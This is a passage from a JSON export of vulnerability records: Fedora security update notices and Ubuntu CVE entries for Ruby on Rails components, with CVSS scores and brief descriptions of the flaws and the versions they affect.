rubygem-actionview-4.2.3-3.fc23", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0752"], "modified": "2016-02-28T12:29:19", "id": "FEDORA:10928605A0F3", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/SHQXAHGKAFMP3R6F3JNE5XXQWDGVU4EP/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-21T08:17:53", "description": "Simple, battle-tested conventions and helpers for building web pages. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-02-28T08:31:07", "type": "fedora", "title": "[SECURITY] Fedora 22 Update: rubygem-actionview-4.2.0-3.fc22", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0752"], "modified": "2016-02-28T08:31:07", "id": "FEDORA:C3F056065295", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/S5RF27PGZNPUXSYGAZWBXIWYNO537IWT/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-21T08:17:53", "description": "Ruby on Rails is a full-stack web framework optimized for programmer happin ess and sustainable productivity. It encourages beautiful code by favoring convention over configuration. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-08-27T11:11:22", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: rubygem-rails-5.0.0.1-1.fc25", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6316", "CVE-2016-6317"], "modified": "2016-08-27T11:11:22", "id": "FEDORA:909536087ECC", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/WAMEZEEF5UHZPV5IDQY4ZP5VLSRSFHY5/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:53", "description": "A toolkit for building modeling frameworks like Active Record. Rich support for attributes, callbacks, validations, serialization, internationalization, and testing. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-08-27T11:11:22", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: rubygem-activemodel-5.0.0.1-1.fc25", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6316", "CVE-2016-6317"], "modified": "2016-08-27T11:11:22", "id": "FEDORA:837166087EC2", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/JNY6ZLXQZ4GJM4L5Z2JD42S4WMYF75U5/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:53", "description": "Rails internals: application bootup, plugins, generators, and rake tasks. Railties is responsible to glue all frameworks together. Overall, it: * handles all the bootstrapping process for a Rails application; * manager rails command line interface; * provides Rails generators core; ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-08-27T11:11:22", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: rubygem-railties-5.0.0.1-2.fc25", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6316", "CVE-2016-6317"], "modified": "2016-08-27T11:11:22", "id": "FEDORA:335C96042D4E", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/JWPXPNMF2BDDQ7AGYMPNOYVDE3BN3RFG/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:53", "description": "Eases web-request routing, handling, and response as a half-way front, half-way page controller. Implemented with specific emphasis on enabling ea sy unit/integration testing that doesn't require a browser. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-08-27T11:11:22", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: rubygem-actionpack-5.0.0.1-2.fc25", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6316", "CVE-2016-6317"], "modified": "2016-08-27T11:11:22", "id": "FEDORA:072A56042D49", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/7SB36DN7LSLP2GHE4LNAQGWXRMHZEU5F/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:53", "description": "Simple, battle-tested conventions and helpers for building web pages. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-08-27T11:11:22", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: rubygem-actionview-5.0.0.1-2.fc25", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6316", "CVE-2016-6317"], "modified": "2016-08-27T11:11:22", "id": "FEDORA:2B7856042D4C", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/INSRTFAYYUM2XLIWRMW2ZQBU6VNPXG6B/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:53", "description": "Implements the ActiveRecord pattern (Fowler, PoEAA) for ORM. It ties databa se tables and classes together for business objects, like Customer or Subscription, that can find, save, and destroy themselves without resorting to manual SQL. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-08-27T11:11:22", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: rubygem-activerecord-5.0.0.1-1.fc25", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6316", "CVE-2016-6317"], "modified": "2016-08-27T11:11:22", "id": "FEDORA:3C1406042D4F", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/5VQDB7AQ3WT2TSLDMYPYKXIMBJ7KYSJ6/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:53", "description": "Structure many real-time application concerns into channels over a single WebSocket connection. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-08-27T11:11:22", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: rubygem-actioncable-5.0.0.1-1.fc25", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6316", "CVE-2016-6317"], "modified": "2016-08-27T11:11:22", "id": "FEDORA:45DE46042D51", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/XOQL7IU7SB6QJRWGKCHRPZQUOIURV63S/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:53", "description": "Declare job classes that can be run by a variety of queueing backends. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-08-27T11:11:22", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: rubygem-activejob-5.0.0.1-1.fc25", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6316", "CVE-2016-6317"], "modified": "2016-08-27T11:11:22", "id": "FEDORA:7E33C6042D49", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/R67FRLEDPZRRVMJS3A5LA6YIM5UQO4GY/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:53", "description": "A toolkit of support libraries and Ruby core extensions extracted from the Rails framework. Rich support for multibyte strings, internationalization, time zones, and testing. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-08-27T11:11:22", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: rubygem-activesupport-5.0.0.1-1.fc25", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6316", "CVE-2016-6317"], "modified": "2016-08-27T11:11:22", "id": "FEDORA:9D8B2608A217", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/MRQYAVBWV4UNQ5XC3LB5L44OYTI3JZ3W/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:53", "description": "Email on Rails. Compose, deliver, receive, and test emails using the famili ar controller/view pattern. First-class support for multipart email and attachments. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-08-27T11:11:22", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: rubygem-actionmailer-5.0.0.1-1.fc25", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6316", "CVE-2016-6317"], "modified": "2016-08-27T11:11:22", "id": "FEDORA:732356042D46", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/SVDJLLIW67K6FGDQKQEY6EGTKQ7KXRQU/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:53", "description": "Utility library which carries commonly used classes and goodies from the Rails framework ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 1.4}, "published": "2016-02-28T08:31:16", "type": "fedora", "title": "[SECURITY] Fedora 22 Update: rubygem-activesupport-4.2.0-4.fc22", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7576", "CVE-2016-0753"], "modified": "2016-02-28T08:31:16", "id": "FEDORA:62D2F605A0F1", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/M4DYD6QEGX3FGH5VZL7YPXI6SX52S5SJ/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "ubuntucve": [{"lastseen": "2022-08-04T14:12:18", "description": "Directory traversal vulnerability in Action View in Ruby on Rails before\n3.2.22.2 and 4.x before 4.1.14.2 allows remote attackers to read arbitrary\nfiles by leveraging an application's unrestricted use of the render method\nand providing a .. (dot dot) in a pathname. NOTE: this vulnerability\nexists because of an incomplete fix for CVE-2016-0752.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[seth-arnold](<https://launchpad.net/~seth-arnold>) | In Oneiric-Saucy, rails package is just for transition; The rails package contains actual code from vivid onward\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2016-04-07T00:00:00", "type": "ubuntucve", "title": "CVE-2016-2097", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0752", "CVE-2016-2097"], "modified": "2016-04-07T00:00:00", "id": "UB:CVE-2016-2097", "href": "https://ubuntu.com/security/CVE-2016-2097", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-04T14:12:56", "description": "The http_basic_authenticate_with method in\nactionpack/lib/action_controller/metal/http_authentication.rb in the Basic\nAuthentication implementation in Action Controller in Ruby on Rails before\n3.2.22.1, 4.0.x and 4.1.x before 4.1.14.1, 4.2.x before 4.2.5.1, and 5.x\nbefore 5.0.0.beta1.1 does not use a constant-time algorithm for verifying\ncredentials, which makes it easier for remote attackers to bypass\nauthentication by measuring timing differences.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[seth-arnold](<https://launchpad.net/~seth-arnold>) | In Oneiric-Saucy, rails package is just for transition; The rails package contains actual code from vivid onward precise_ruby-actionpack-2.3 -- documentation is buggy but doesn't contain an implmentation itself.\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "LOW", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 3.7, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2016-02-16T00:00:00", "type": "ubuntucve", "title": "CVE-2015-7576", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7576"], "modified": "2016-02-16T00:00:00", "id": "UB:CVE-2015-7576", "href": "https://ubuntu.com/security/CVE-2015-7576", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-04T14:12:17", "description": "Action Pack in Ruby on Rails before 3.2.22.2, 4.x before 4.1.14.2, and\n4.2.x before 4.2.5.2 allows remote attackers to execute arbitrary Ruby code\nby leveraging an application's unrestricted use of the render method.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[seth-arnold](<https://launchpad.net/~seth-arnold>) | In Oneiric-Saucy, rails package is just for transition; The rails package contains actual code from vivid onward\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 7.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.4}, "published": "2016-04-07T00:00:00", "type": "ubuntucve", "title": "CVE-2016-2098", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2098"], "modified": "2016-04-07T00:00:00", "id": "UB:CVE-2016-2098", "href": "https://ubuntu.com/security/CVE-2016-2098", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:12:55", "description": "actionpack/lib/action_dispatch/http/mime_type.rb in Action Pack in Ruby on\nRails before 3.2.22.1, 4.0.x and 4.1.x before 4.1.14.1, 4.2.x before\n4.2.5.1, and 5.x before 5.0.0.beta1.1 does not properly restrict use of the\nMIME type cache, which allows remote attackers to cause a denial of service\n(memory consumption) via a crafted HTTP Accept header.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[seth-arnold](<https://launchpad.net/~seth-arnold>) | In Oneiric-Saucy, rails package is just for transition; The rails package contains actual code from vivid onward\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-02-16T00:00:00", "type": "ubuntucve", "title": "CVE-2016-0751", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0751"], "modified": "2016-02-16T00:00:00", "id": "UB:CVE-2016-0751", "href": "https://ubuntu.com/security/CVE-2016-0751", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-04T14:12:54", "description": "Directory traversal vulnerability in Action View in Ruby on Rails before\n3.2.22.1, 4.0.x and 4.1.x before 4.1.14.1, 4.2.x before 4.2.5.1, and 5.x\nbefore 5.0.0.beta1.1 allows remote attackers to read arbitrary files by\nleveraging an application's unrestricted use of the render method and\nproviding a .. (dot dot) in a pathname.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[seth-arnold](<https://launchpad.net/~seth-arnold>) | In Oneiric-Saucy, rails package is just for transition; The rails package contains actual code from vivid onward\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-02-16T00:00:00", "type": "ubuntucve", "title": "CVE-2016-0752", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0752"], "modified": "2016-02-16T00:00:00", 